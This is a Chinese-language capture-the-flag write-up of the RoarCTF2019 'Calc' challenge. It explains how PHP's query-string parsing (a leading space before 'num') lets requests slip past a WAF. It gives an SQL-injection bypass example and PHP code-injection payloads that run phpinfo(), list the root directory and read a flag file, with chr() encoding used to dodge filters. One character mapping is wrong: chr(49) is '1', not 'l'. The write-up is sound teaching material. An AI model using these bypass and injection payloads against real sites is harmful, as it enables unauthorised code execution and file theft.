RoarCTF2019 Calc

RoarCTF2019 Calc

一、知识点

1.1PHP的字符串解析特性

这是别人对PHP字符串解析漏洞的理解，
我们知道PHP将查询字符串（在URL或正文中）转换为内部${}_{G}ET或的关联数组$_POST。例如：/?foo=bar变成Array([foo] => “bar”)。值得注意的是，查询字符串在解析的过程中会将某些字符删除或用下划线代替。例如，/?%20news[id%00=42会转换为Array([news_id] => 42)。如果一个IDS/IPS或WAF中有一条规则是当news_id参数的值是一个非数字的值则拦截，那么我们就可以用以下语句绕过：

/news.php?%20news[id%00=42"+AND+1=0–

上述PHP语句的参数%20news[id%00的值将存储到$_GET[“news_id”]中。

HP需要将所有参数转换为有效的变量名，因此在解析查询字符串时，它会做两件事：

1.删除空白符

2.将某些字符转换为下划线（包括空格）
123

我的理解：
假如waf不允许num变量传递字母：

http://www.xxx.com/index.php?num = aaaa   //显示非法输入的话
1

那么我们可以在num前加个空格：

http://www.xxx.com/index.php? num = aaaa
1

这样waf就找不到num这个变量了，因为现在的变量叫“ num”，而不是“num”。但php在解析的时候，会先把空格给去掉，这样我们的代码还能正常运行，还上传了非法字符。

1.2waf

原来waf我们是看不见的，我一直以为题里的源码，就是waf了。并且，waf并不是说，题目是用php写的，那么waf就一定是用php写的。也正因如此，这题的waf才会无法识别“ num”和“num”其实是一样的。

1.3 scandir()

列出 参数目录 中的文件和目录，要不然我们怎么知道flag在哪。

二、解题步骤

1、打开源码，发现可疑url：calc.php，直接访问calc.php试试

2、发现源码中过滤了很多，给num参数传字母不行，传数字可以，证明了这是WAF的问题：WAF不允许num传入字母，那我们可以在num前加个空格来绕过WAF
这里利用PHP的字符串解析特性来绕过WAF，如

calc.php? num=phpinfo();

3、扫根目录下的所有文件，也就是scandir("/")

? num=print_r(scandir('/'));
//这里由于单引号被过滤了，那就用chr()绕过，chr(47)就是斜杠/
? num=print_r(scandir(chr(47)));

4、找到了flagg，读取flagg文件

? num=print_r(file_get_contents('/flagg'));
这里/=chr(47)，f=chr(102),l=chr(49),a=chr(97),g=chr(103),g=chr(103)来进行绕过
? num=print_r(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)));

或者

calc.php? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

5、拿到flag：flag{5dd33e34-ea83-4178-9151-ae97ee557445}